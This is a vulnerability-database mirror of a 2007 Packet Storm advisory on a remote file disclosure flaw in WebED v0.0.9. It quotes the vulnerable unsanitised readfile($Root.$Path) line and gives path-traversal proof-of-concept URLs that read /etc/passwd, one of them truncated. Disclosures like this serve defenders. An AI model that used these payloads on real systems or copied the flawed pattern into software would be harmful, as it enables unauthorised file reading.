Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

webed-disclose.txt

๐Ÿ—“๏ธย 30 Nov 2007ย 00:00:00Reported byย GolD_MTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

WebED v0.0.9 Remote File Disclosure Vulnerabilities in index.ph

Show more
Code
`WebED v0.0.9 (index.php) Remote File Disclosure Vulnerabilities  
Script : http://heanet.dl.sourceforge.net/sourceforge/ed-engine/WebED_v0.0.9.tar.gz  
Vuln Code In /mod/chat/index.php :  
<body>  
<?php readfile($Root.$Path); ?> <---[xxx]  
<form action="application_loader.php" method="post">  
PoC :  
/mod/chat/index.php?Root=../../../../../../etc/passwd  
/mod/chat/index.php?Path=../../../../../../etc/pa  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4
webedremote file disclosurevulnerabilitiesindex.php
15
.json
Report